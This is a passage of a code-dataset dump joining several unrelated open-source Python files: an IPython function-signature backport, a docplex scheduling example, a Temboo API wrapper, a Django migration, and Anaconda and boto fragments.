repo = self.getRepo(ks_repo.name)
if not repo:
continue
except (dnf.exceptions.RepoError, KeyError):
continue
repo_path = pyanaconda.iutil.getSysroot() + YUM_REPOS_DIR + "%s.repo" % repo.id
try:
log.info("Writing %s.repo to target system.", repo.id)
self._writeDNFRepo(repo, repo_path)
except packaging.PayloadSetupError as e:
log.error(e)
# Write the langpacks config to the target system
target_langpath = pyanaconda.iutil.getSysroot() + _DNF_TARGET_LANGPACK_CONF
pyanaconda.iutil.mkdirChain(os.path.dirname(target_langpath))
shutil.copy2(_DNF_INSTALLER_LANGPACK_CONF, target_langpath)
super(DNFPayload, self).postInstall()
def writeStorageLate(self):
pass
| gpl-2.0 |
ammarkhann/FinalSeniorCode | lib/python2.7/site-packages/IPython/utils/_signatures.py | 16 | 29681 | """Function signature objects for callables.
Back port of Python 3.3's function signature tools from the inspect module,
modified to be compatible with Python 2.7 and 3.2+.
"""
#-----------------------------------------------------------------------------
# Python 3.3 stdlib inspect.py is public domain
#
# Backports Copyright (C) 2013 Aaron Iles
# Used under Apache License Version 2.0
#
# Further Changes are Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import itertools
import functools
import re
import types
# patch for single-file
# we don't support 2.6, so we can just import OrderedDict
from collections import OrderedDict
__version__ = '0.3'
# end patch
__all__ = ['BoundArguments', 'Parameter', 'Signature', 'signature']
_WrapperDescriptor = type(type.__call__)
_MethodWrapper = type(all.__call__)
_NonUserDefinedCallables = (_WrapperDescriptor,
_MethodWrapper,
types.BuiltinFunctionType)
def formatannotation(annotation, base_module=None):
if isinstance(annotation, type):
if annotation.__module__ in ('builtins', '__builtin__', base_module):
return annotation.__name__
return annotation.__module__+'.'+annotation.__name__
return repr(annotation)
def _get_user_defined_method(cls, method_name, *nested):
try:
if cls is type:
return
meth = getattr(cls, method_name)
for name in nested:
meth = getattr(meth, name, meth)
except AttributeError:
return
else:
if not isinstance(meth, _NonUserDefinedCallables):
# Once '__signature__' will be added to 'C'-level
# callables, this check won't be necessary
return meth
def signature(obj):
'''Get a signature object for the passed callable.'''
if not callable(obj):
raise TypeError('{0!r} is not a callable object'.format(obj))
if isinstance(obj, types.MethodType):
if obj.__self__ is None:
# Unbound method - treat it as a function (no distinction in Py 3)
obj = obj.__func__
else:
# Bound method: trim off the first parameter (typically self or cls)
sig = signature(obj.__func__)
return sig.replace(parameters=tuple(sig.parameters.values())[1:])
try:
sig = obj.__signature__
except AttributeError:
pass
else:
if sig is not None:
return sig
try:
# Was this function wrapped by a decorator?
wrapped = obj.__wrapped__
except AttributeError:
pass
else:
return signature(wrapped)
if isinstance(obj, types.FunctionType):
return Signature.from_function(obj)
if isinstance(obj, functools.partial):
sig = signature(obj.func)
new_params = OrderedDict(sig.parameters.items())
partial_args = obj.args or ()
partial_keywords = obj.keywords or {}
try:
ba = sig.bind_partial(*partial_args, **partial_keywords)
except TypeError as ex:
msg = 'partial object {0!r} has incorrect arguments'.format(obj)
raise ValueError(msg)
for arg_name, arg_value in ba.arguments.items():
param = new_params[arg_name]
if arg_name in partial_keywords:
# We set a new default value, because the following code
# is correct:
#
# >>> def foo(a): print(a)
# >>> print(partial(partial(foo, a=10), a=20)())
# 20
# >>> print(partial(partial(foo, a=10), a=20)(a=30))
# 30
#
# So, with 'partial' objects, passing a keyword argument is
# like setting a new default value for the corresponding
# parameter
#
# We also mark this parameter with '_partial_kwarg'
# flag. Later, in '_bind', the 'default' value of this
# parameter will be added to 'kwargs', to simulate
# the 'functools.partial' real call.
new_params[arg_name] = param.replace(default=arg_value,
_partial_kwarg=True)
elif (param.kind not in (_VAR_KEYWORD, _VAR_POSITIONAL) and
not param._partial_kwarg):
new_params.pop(arg_name)
return sig.replace(parameters=new_params.values())
sig = None
if isinstance(obj, type):
# obj is a class or a metaclass
# First, let's see if it has an overloaded __call__ defined
# in its metaclass
call = _get_user_defined_method(type(obj), '__call__')
if call is not None:
sig = signature(call)
else:
# Now we check if the 'obj' class has a '__new__' method
new = _get_user_defined_method(obj, '__new__')
if new is not None:
sig = signature(new)
else:
# Finally, we should have at least __init__ implemented
init = _get_user_defined_method(obj, '__init__')
if init is not None:
sig = signature(init)
elif not isinstance(obj, _NonUserDefinedCallables):
# An object with __call__
# We also check that the 'obj' is not an instance of
# _WrapperDescriptor or _MethodWrapper to avoid
# infinite recursion (and even potential segfault)
call = _get_user_defined_method(type(obj), '__call__', 'im_func')
if call is not None:
sig = signature(call)
if sig is not None:
return sig
if isinstance(obj, types.BuiltinFunctionType):
# Raise a nicer error message for builtins
msg = 'no signature found for builtin function {0!r}'.format(obj)
raise ValueError(msg)
raise ValueError('callable {0!r} is not supported by signature'.format(obj))
class _void(object):
'''A private marker - used in Parameter & Signature'''
class _empty(object):
pass
class _ParameterKind(int):
def __new__(self, *args, **kwargs):
obj = int.__new__(self, *args)
obj._name = kwargs['name']
return obj
def __str__(self):
return self._name
def __repr__(self):
return '<_ParameterKind: {0!r}>'.format(self._name)
_POSITIONAL_ONLY = _ParameterKind(0, name='POSITIONAL_ONLY')
_POSITIONAL_OR_KEYWORD = _ParameterKind(1, name='POSITIONAL_OR_KEYWORD')
_VAR_POSITIONAL = _ParameterKind(2, name='VAR_POSITIONAL')
_KEYWORD_ONLY = _ParameterKind(3, name='KEYWORD_ONLY')
_VAR_KEYWORD = _ParameterKind(4, name='VAR_KEYWORD')
class Parameter(object):
'''Represents a parameter in a function signature.
Has the following public attributes:
* name : str
The name of the parameter as a string.
* default : object
The default value for the parameter if specified. If the
parameter has no default value, this attribute is not set.
* annotation
The annotation for the parameter if specified. If the
parameter has no annotation, this attribute is not set.
* kind : str
Describes how argument values are bound to the parameter.
Possible values: `Parameter.POSITIONAL_ONLY`,
`Parameter.POSITIONAL_OR_KEYWORD`, `Parameter.VAR_POSITIONAL`,
`Parameter.KEYWORD_ONLY`, `Parameter.VAR_KEYWORD`.
'''
__slots__ = ('_name', '_kind', '_default', '_annotation', '_partial_kwarg')
POSITIONAL_ONLY = _POSITIONAL_ONLY
POSITIONAL_OR_KEYWORD = _POSITIONAL_OR_KEYWORD
VAR_POSITIONAL = _VAR_POSITIONAL
KEYWORD_ONLY = _KEYWORD_ONLY
VAR_KEYWORD = _VAR_KEYWORD
empty = _empty
def __init__(self, name, kind, default=_empty, annotation=_empty,
_partial_kwarg=False):
if kind not in (_POSITIONAL_ONLY, _POSITIONAL_OR_KEYWORD,
_VAR_POSITIONAL, _KEYWORD_ONLY, _VAR_KEYWORD):
raise ValueError("invalid value for 'Parameter.kind' attribute")
self._kind = kind
if default is not _empty:
if kind in (_VAR_POSITIONAL, _VAR_KEYWORD):
msg = '{0} parameters cannot have default values'.format(kind)
raise ValueError(msg)
self._default = default
self._annotation = annotation
if name is None:
if kind != _POSITIONAL_ONLY:
raise ValueError("None is not a valid name for a "
"non-positional-only parameter")
self._name = name
else:
name = str(name)
if kind != _POSITIONAL_ONLY and not re.match(r'[a-z_]\w*$', name, re.I):
msg = '{0!r} is not a valid parameter name'.format(name)
raise ValueError(msg)
self._name = name
self._partial_kwarg = _partial_kwarg
@property
def name(self):
return self._name
@property
def default(self):
return self._default
@property
def annotation(self):
return self._annotation
@property
def kind(self):
return self._kind
def replace(self, name=_void, kind=_void, annotation=_void,
default=_void, _partial_kwarg=_void):
'''Creates a customized copy of the Parameter.'''
if name is _void:
name = self._name
if kind is _void:
kind = self._kind
if annotation is _void:
annotation = self._annotation
if default is _void:
default = self._default
if _partial_kwarg is _void:
_partial_kwarg = self._partial_kwarg
return type(self)(name, kind, default=default, annotation=annotation,
_partial_kwarg=_partial_kwarg)
def __str__(self):
kind = self.kind
formatted = self._name
if kind == _POSITIONAL_ONLY:
if formatted is None:
formatted = ''
formatted = '<{0}>'.format(formatted)
# Add annotation and default value
if self._annotation is not _empty:
formatted = '{0}:{1}'.format(formatted,
formatannotation(self._annotation))
if self._default is not _empty:
formatted = '{0}={1}'.format(formatted, repr(self._default))
if kind == _VAR_POSITIONAL:
formatted = '*' + formatted
elif kind == _VAR_KEYWORD:
formatted = '**' + formatted
return formatted
def __repr__(self):
return '<{0} at {1:#x} {2!r}>'.format(self.__class__.__name__,
id(self), self.name)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, Parameter) and
self._name == other._name and
self._kind == other._kind and
self._default == other._default and
self._annotation == other._annotation)
def __ne__(self, other):
return not self.__eq__(other)
class BoundArguments(object):
'''Result of :meth:`Signature.bind` call. Holds the mapping of arguments
to the function's parameters.
Has the following public attributes:
arguments : :class:`collections.OrderedDict`
An ordered mutable mapping of parameters' names to arguments' values.
Does not contain arguments' default values.
signature : :class:`Signature`
The Signature object that created this instance.
args : tuple
Tuple of positional arguments values.
kwargs : dict
Dict of keyword arguments values.
'''
def __init__(self, signature, arguments):
self.arguments = arguments
self._signature = signature
@property
def signature(self):
return self._signature
@property
def args(self):
args = []
for param_name, param in self._signature.parameters.items():
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
# Keyword arguments mapped by 'functools.partial'
# (Parameter._partial_kwarg is True) are mapped
# in 'BoundArguments.kwargs', along with VAR_KEYWORD &
# KEYWORD_ONLY
break
try:
arg = self.arguments[param_name]
except KeyError:
# We're done here. Other arguments
# will be mapped in 'BoundArguments.kwargs'
break
else:
if param.kind == _VAR_POSITIONAL:
# *args
args.extend(arg)
else:
# plain argument
args.append(arg)
return tuple(args)
@property
def kwargs(self):
kwargs = {}
kwargs_started = False
for param_name, param in self._signature.parameters.items():
if not kwargs_started:
if (param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY) or
param._partial_kwarg):
kwargs_started = True
else:
if param_name not in self.arguments:
kwargs_started = True
continue
if not kwargs_started:
continue
try:
arg = self.arguments[param_name]
except KeyError:
pass
else:
if param.kind == _VAR_KEYWORD:
# **kwargs
kwargs.update(arg)
else:
# plain keyword argument
kwargs[param_name] = arg
return kwargs
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
return (issubclass(other.__class__, BoundArguments) and
self.signature == other.signature and
self.arguments == other.arguments)
def __ne__(self, other):
return not self.__eq__(other)
class Signature(object):
'''A Signature object represents the overall signature of a function.
It stores a Parameter object for each parameter accepted by the
function, as well as information specific to the function itself.
A Signature object has the following public attributes:
parameters : :class:`collections.OrderedDict`
An ordered mapping of parameters' names to the corresponding
Parameter objects (keyword-only arguments are in the same order
as listed in `code.co_varnames`).
return_annotation
The annotation for the return type of the function if specified.
If the function has no annotation for its return type, this
attribute is not set.
'''
__slots__ = ('_return_annotation', '_parameters')
_parameter_cls = Parameter
_bound_arguments_cls = BoundArguments
empty = _empty
def __init__(self, parameters=None, return_annotation=_empty,
__validate_parameters__=True):
'''Constructs Signature from the given list of Parameter
objects and 'return_annotation'. All arguments are optional.
'''
if parameters is None:
params = OrderedDict()
else:
if __validate_parameters__:
params = OrderedDict()
top_kind = _POSITIONAL_ONLY
for idx, param in enumerate(parameters):
kind = param.kind
if kind < top_kind:
msg = 'wrong parameter order: {0} before {1}'
msg = msg.format(top_kind, param.kind)
raise ValueError(msg)
else:
top_kind = kind
name = param.name
if name is None:
name = str(idx)
param = param.replace(name=name)
if name in params:
msg = 'duplicate parameter name: {0!r}'.format(name)
raise ValueError(msg)
params[name] = param
else:
params = OrderedDict(((param.name, param)
for param in parameters))
self._parameters = params
self._return_annotation = return_annotation
@classmethod
def from_function(cls, func):
'''Constructs Signature for the given python function'''
if not isinstance(func, types.FunctionType):
raise TypeError('{0!r} is not a Python function'.format(func))
Parameter = cls._parameter_cls
# Parameter information.
func_code = func.__code__
pos_count = func_code.co_argcount
arg_names = func_code.co_varnames
positional = tuple(arg_names[:pos_count])
keyword_only_count = getattr(func_code, 'co_kwonlyargcount', 0)
keyword_only = arg_names[pos_count:(pos_count + keyword_only_count)]
annotations = getattr(func, '__annotations__', {})
defaults = func.__defaults__
kwdefaults = getattr(func, '__kwdefaults__', None)
if defaults:
pos_default_count = len(defaults)
else:
pos_default_count = 0
parameters = []
# Non-keyword-only parameters w/o defaults.
non_default_count = pos_count - pos_default_count
for name in positional[:non_default_count]:
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD))
# ... w/ defaults.
for offset, name in enumerate(positional[non_default_count:]):
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_POSITIONAL_OR_KEYWORD,
default=defaults[offset]))
# *args
if func_code.co_flags & 0x04:
name = arg_names[pos_count + keyword_only_count]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_POSITIONAL))
# Keyword-only parameters.
for name in keyword_only:
default = _empty
if kwdefaults is not None:
default = kwdefaults.get(name, _empty)
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_KEYWORD_ONLY,
default=default))
# **kwargs
if func_code.co_flags & 0x08:
index = pos_count + keyword_only_count
if func_code.co_flags & 0x04:
index += 1
name = arg_names[index]
annotation = annotations.get(name, _empty)
parameters.append(Parameter(name, annotation=annotation,
kind=_VAR_KEYWORD))
return cls(parameters,
return_annotation=annotations.get('return', _empty),
__validate_parameters__=False)
@property
def parameters(self):
try:
return types.MappingProxyType(self._parameters)
except AttributeError:
return OrderedDict(self._parameters.items())
@property
def return_annotation(self):
return self._return_annotation
def replace(self, parameters=_void, return_annotation=_void):
'''Creates a customized copy of the Signature.
Pass 'parameters' and/or 'return_annotation' arguments
to override them in the new copy.
'''
if parameters is _void:
parameters = self.parameters.values()
if return_annotation is _void:
return_annotation = self._return_annotation
return type(self)(parameters,
return_annotation=return_annotation)
def __hash__(self):
msg = "unhashable type: '{0}'".format(self.__class__.__name__)
raise TypeError(msg)
def __eq__(self, other):
if (not issubclass(type(other), Signature) or
self.return_annotation != other.return_annotation or
len(self.parameters) != len(other.parameters)):
return False
other_positions = dict((param, idx)
for idx, param in enumerate(other.parameters.keys()))
for idx, (param_name, param) in enumerate(self.parameters.items()):
if param.kind == _KEYWORD_ONLY:
try:
other_param = other.parameters[param_name]
except KeyError:
return False
else:
if param != other_param:
return False
else:
try:
other_idx = other_positions[param_name]
except KeyError:
return False
else:
if (idx != other_idx or
param != other.parameters[param_name]):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def _bind(self, args, kwargs, partial=False):
'''Private method. Don't use directly.'''
arguments = OrderedDict()
parameters = iter(self.parameters.values())
parameters_ex = ()
arg_vals = iter(args)
if partial:
# Support for binding arguments to 'functools.partial' objects.
# See 'functools.partial' case in 'signature()' implementation
# for details.
for param_name, param in self.parameters.items():
if (param._partial_kwarg and param_name not in kwargs):
# Simulating 'functools.partial' behavior
kwargs[param_name] = param.default
while True:
# Let's iterate through the positional arguments and corresponding
# parameters
try:
arg_val = next(arg_vals)
except StopIteration:
# No more positional arguments
try:
param = next(parameters)
except StopIteration:
# No more parameters. That's it. Just need to check that
# we have no `kwargs` after this while loop
break
else:
if param.kind == _VAR_POSITIONAL:
# That's OK, just empty *args. Let's start parsing
# kwargs
break
elif param.name in kwargs:
if param.kind == _POSITIONAL_ONLY:
msg = '{arg!r} parameter is positional only, ' \
'but was passed as a keyword'
msg = msg.format(arg=param.name)
raise TypeError(msg)
parameters_ex = (param,)
break
elif (param.kind == _VAR_KEYWORD or
param.default is not _empty):
# That's fine too - we have a default value for this
# parameter. So, lets start parsing `kwargs`, starting
# with the current parameter
parameters_ex = (param,)
break
else:
if partial:
parameters_ex = (param,)
break
else:
msg = '{arg!r} parameter lacking default value'
msg = msg.format(arg=param.name)
raise TypeError(msg)
else:
# We have a positional argument to process
try:
param = next(parameters)
except StopIteration:
raise TypeError('too many positional arguments')
else:
if param.kind in (_VAR_KEYWORD, _KEYWORD_ONLY):
# Looks like we have no parameter for this positional
# argument
raise TypeError('too many positional arguments')
if param.kind == _VAR_POSITIONAL:
# We have an '*args'-like argument, let's fill it with
# all positional arguments we have left and move on to
# the next phase
values = [arg_val]
values.extend(arg_vals)
arguments[param.name] = tuple(values)
break
if param.name in kwargs:
raise TypeError('multiple values for argument '
'{arg!r}'.format(arg=param.name))
arguments[param.name] = arg_val
# Now, we iterate through the remaining parameters to process
# keyword arguments
kwargs_param = None
for param in itertools.chain(parameters_ex, parameters):
if param.kind == _POSITIONAL_ONLY:
# This should never happen in case of a properly built
# Signature object (but let's have this check here
# to ensure correct behaviour just in case)
raise TypeError('{arg!r} parameter is positional only, '
'but was passed as a keyword'. \
format(arg=param.name))
if param.kind == _VAR_KEYWORD:
# Memorize that we have a '**kwargs'-like parameter
kwargs_param = param
continue
param_name = param.name
try:
arg_val = kwargs.pop(param_name)
except KeyError:
# We have no value for this parameter. It's fine though,
# if it has a default value, or it is an '*args'-like
# parameter, left alone by the processing of positional
# arguments.
if (not partial and param.kind != _VAR_POSITIONAL and
param.default is _empty):
raise TypeError('{arg!r} parameter lacking default value'. \
format(arg=param_name))
else:
arguments[param_name] = arg_val
if kwargs:
if kwargs_param is not None:
# Process our '**kwargs'-like parameter
arguments[kwargs_param.name] = kwargs
else:
raise TypeError('too many keyword arguments')
return self._bound_arguments_cls(self, arguments)
def bind(self, *args, **kwargs):
'''Get a :class:`BoundArguments` object, that maps the passed `args`
and `kwargs` to the function's signature. Raises :exc:`TypeError`
if the passed arguments can not be bound.
'''
return self._bind(args, kwargs)
def bind_partial(self, *args, **kwargs):
'''Get a :class:`BoundArguments` object, that partially maps the
passed `args` and `kwargs` to the function's signature.
Raises :exc:`TypeError` if the passed arguments can not be bound.
'''
return self._bind(args, kwargs, partial=True)
def __str__(self):
result = []
render_kw_only_separator = True
for idx, param in enumerate(self.parameters.values()):
formatted = str(param)
kind = param.kind
if kind == _VAR_POSITIONAL:
# OK, we have an '*args'-like parameter, so we won't need
# a '*' to separate keyword-only arguments
render_kw_only_separator = False
elif kind == _KEYWORD_ONLY and render_kw_only_separator:
# We have a keyword-only parameter to render and we haven't
# rendered an '*args'-like parameter before, so add a '*'
# separator to the parameters list ("foo(arg1, *, arg2)" case)
result.append('*')
# This condition should be only triggered once, so
# reset the flag
render_kw_only_separator = False
result.append(formatted)
rendered = '({0})'.format(', '.join(result))
if self.return_annotation is not _empty:
anno = formatannotation(self.return_annotation)
rendered += ' -> {0}'.format(anno)
return rendered
| mit |
IBMDecisionOptimization/docplex-examples | examples/cp/visu/house_building_time.py | 1 | 4306 | # --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2015, 2016
# --------------------------------------------------------------------------
"""
This is a problem of building a house. The masonry, roofing, painting,
etc. must be scheduled. Some tasks must necessarily take place before
others and these requirements are expressed through precedence
constraints.
Moreover, there are earliness and tardiness costs associated with some tasks.
The objective is to minimize these costs.
Please refer to documentation for appropriate setup of solving configuration.
"""
from docplex.cp.model import *
#-----------------------------------------------------------------------------
# Initialize the problem data
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# List of tasks to be executed for the house
TASKS = {
'masonry' : (35 , 1, {'release_date':25, 'earliness_cost':200.0} ),
'carpentry' : (15 , 2, {'release_date':75, 'earliness_cost':300.0} ),
'plumbing' : (40 , 3, {} ),
'ceiling' : (15 , 4, {'release_date':75, 'earliness_cost':100.0} ),
'roofing' : ( 5 , 5, {} ),
'painting' : (10 , 6, {} ),
'windows' : ( 5 , 7, {} ),
'facade' : (10 , 8, {} ),
'garden' : ( 5 , 9, {} ),
'moving' : ( 5 , 10, {'due_date':100, 'tardiness_cost':400.0} )
}
# Tasks precedence constraints (each tuple (X, Y) means X ends before start of Y)
PRECEDENCES = [
('masonry', 'carpentry'),
('masonry', 'plumbing'),
('masonry', 'ceiling'),
('carpentry', 'roofing'),
('ceiling', 'painting'),
('roofing', 'windows'),
('roofing', 'facade'),
('plumbing', 'facade'),
('roofing', 'garden'),
('plumbing', 'garden'),
('windows', 'moving'),
('facade', 'moving'),
('garden', 'moving'),
('painting', 'moving'),
]
#-----------------------------------------------------------------------------
# Build the model
#-----------------------------------------------------------------------------
# Create model
mdl = CpoModel()
# Create interval variable for each building task
tasks = { t: interval_var(size=TASKS[t][0], name=t) for t in TASKS }
# Add precedence constraints
mdl.add(end_before_start(tasks[p], tasks[s]) for p,s in PRECEDENCES)
# Cost function
fearliness = dict() # Task earliness cost function
ftardiness = dict() # Task tardiness cost function
for t in TASKS:
if 'release_date' in TASKS[t][2]:
fearliness[t] = CpoSegmentedFunction((-TASKS[t][2]['earliness_cost'], 0), [(TASKS[t][2]['release_date'], 0, 0)])
if 'due_date' in TASKS[t][2]:
ftardiness[t] = CpoSegmentedFunction((0, 0), [(TASKS[t][2]['due_date'], 0, TASKS[t][2]['tardiness_cost'],)])
# Minimize cost
mdl.add(minimize( sum( start_eval(tasks[t], fearliness[t]) for t in fearliness) +
sum( end_eval (tasks[t], ftardiness[t]) for t in ftardiness) ))
#-----------------------------------------------------------------------------
# Solve the model and display the result
#-----------------------------------------------------------------------------
print('Solving model...')
res = mdl.solve(TimeLimit=10)
print('Solution:')
res.print_solution()
import docplex.cp.utils_visu as visu
if res and visu.is_visu_enabled():
visu.timeline('Solution house building', origin=10, horizon=120)
visu.panel('Schedule')
for t in TASKS:
visu.interval(res.get_var_solution(tasks[t]), TASKS[t][1], t)
for t in TASKS:
itvsol = res.get_var_solution(tasks[t])
if 'release_date' in TASKS[t][2]:
visu.panel('Earliness')
cost = fearliness[t].get_value(itvsol.get_start())
visu.function(segments=[(itvsol, cost, t)], color=TASKS[t][1], style='interval')
visu.function(segments=fearliness[t], color=TASKS[t][1])
if 'due_date' in TASKS[t][2]:
visu.panel('Tardiness')
cost = ftardiness[t].get_value(itvsol.get_end())
visu.function(segments=[(itvsol, cost, t)], color=TASKS[t][1], style='interval')
visu.function(segments=ftardiness[t], color=TASKS[t][1])
visu.show()
| apache-2.0 |
jordanemedlock/psychtruths | temboo/core/Library/FilesAnywhere/ListItems.py | 5 | 5459 | # -*- coding: utf-8 -*-
###############################################################################
#
# ListItems
# Lists files within a specified directory in your FilesAnywhere account.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class ListItems(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the ListItems Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(ListItems, self).__init__(temboo_session, '/Library/FilesAnywhere/ListItems')
def new_input_set(self):
return ListItemsInputSet()
def _make_result_set(self, result, path):
return ListItemsResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListItemsChoreographyExecution(session, exec_id, path)
class ListItemsInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListItems
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((conditional, string) The API Key provided by FilesAnywhere. Required unless supplying a valid Token input.)
"""
super(ListItemsInputSet, self)._set_input('APIKey', value)
def set_OrgID(self, value):
"""
Set the value of the OrgID input for this Choreo. ((conditional, integer) Defaults to 0 for a FilesAnywhere Web account. Use 50 for a FilesAnywhere WebAdvanced account.)
"""
super(ListItemsInputSet, self)._set_input('OrgID', value)
def set_PageNum(self, value):
"""
Set the value of the PageNum input for this Choreo. ((optional, integer) The page number to return. Can be used to page through large result sets. Defaults to 1.)
"""
super(ListItemsInputSet, self)._set_input('PageNum', value)
def set_PageSize(self, value):
"""
Set the value of the PageSize input for this Choreo. ((optional, integer) The number of results to return per page. Defaults to 10.)
"""
super(ListItemsInputSet, self)._set_input('PageSize', value)
def set_Password(self, value):
"""
Set the value of the Password input for this Choreo. ((conditional, password) Your FilesAnywhere password. Required unless supplying a valid Token input.)
"""
super(ListItemsInputSet, self)._set_input('Password', value)
def set_Path(self, value):
"""
Set the value of the Path input for this Choreo. ((required, string) The path to the folder that you want to list items for (i.e. \JOHNSMITH\MyFolder).)
"""
super(ListItemsInputSet, self)._set_input('Path', value)
def set_Token(self, value):
"""
Set the value of the Token input for this Choreo. ((conditional, string) If provided, the Choreo will use the token to authenticate. If the token is expired or not provided, the Choreo will relogin and retrieve a new token when APIKey, Username, and Password are supplied.)
"""
super(ListItemsInputSet, self)._set_input('Token', value)
def set_Username(self, value):
"""
Set the value of the Username input for this Choreo. ((conditional, string) Your FilesAnywhere username. Required unless supplying a valid Token input.)
"""
super(ListItemsInputSet, self)._set_input('Username', value)
class ListItemsResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListItems Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((xml) The response from FilesAnywhere.)
"""
return self._output.get('Response', None)
def get_Token(self):
"""
Retrieve the value for the "Token" output from this Choreo execution. ((conditional, string) If provided, the Choreo will use the token to authenticate. If the token is expired or not provided, the Choreo will relogin and retrieve a new token when APIKey, Username, and Password are supplied.)
"""
return self._output.get('Token', None)
class ListItemsChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListItemsResultSet(response, path)
| apache-2.0 |
nttks/jenkins-test | common/djangoapps/course_modes/migrations/0005_auto__add_field_coursemode_expiration_datetime.py | 114 | 1859 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CourseMode.expiration_datetime'
db.add_column('course_modes_coursemode', 'expiration_datetime',
self.gf('django.db.models.fields.DateTimeField')(default=None, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CourseMode.expiration_datetime'
db.delete_column('course_modes_coursemode', 'expiration_datetime')
models = {
'course_modes.coursemode': {
'Meta': {'unique_together': "(('course_id', 'mode_slug', 'currency'),)", 'object_name': 'CourseMode'},
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'expiration_date': ('django.db.models.fields.DateField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'expiration_datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'min_price': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'mode_display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'mode_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'suggested_prices': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'default': "''", 'max_length': '255', 'blank': 'True'})
}
}
complete_apps = ['course_modes']
| agpl-3.0 |
Workday/OpenFrame | tools/telemetry/third_party/gsutilz/third_party/boto/boto/vpc/vpc.py | 135 | 7868 | # Copyright (c) 2009-2010 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents a Virtual Private Cloud.
"""
from boto.ec2.ec2object import TaggedEC2Object
class VPC(TaggedEC2Object):
def __init__(self, connection=None):
"""
Represents a VPC.
:ivar id: The unique ID of the VPC.
:ivar dhcp_options_id: The ID of the set of DHCP options you've associated with the VPC
(or default if the default options are associated with the VPC).
:ivar state: The current state of the VPC.
:ivar cidr_block: The CIDR block for the VPC.
:ivar is_default: Indicates whether the VPC is the default VPC.
:ivar instance_tenancy: The allowed tenancy of instances launched into the VPC.
:ivar classic_link_enabled: Indicates whether ClassicLink is enabled.
"""
super(VPC, self).__init__(connection)
self.id = None
self.dhcp_options_id = None
self.state = None
self.cidr_block = None
self.is_default = None
self.instance_tenancy = None
self.classic_link_enabled = None
def __repr__(self):
return 'VPC:%s' % self.id
def endElement(self, name, value, connection):
if name == 'vpcId':
self.id = value
elif name == 'dhcpOptionsId':
self.dhcp_options_id = value
elif name == 'state':
self.state = value
elif name == 'cidrBlock':
self.cidr_block = value
elif name == 'isDefault':
self.is_default = True if value == 'true' else False
elif name == 'instanceTenancy':
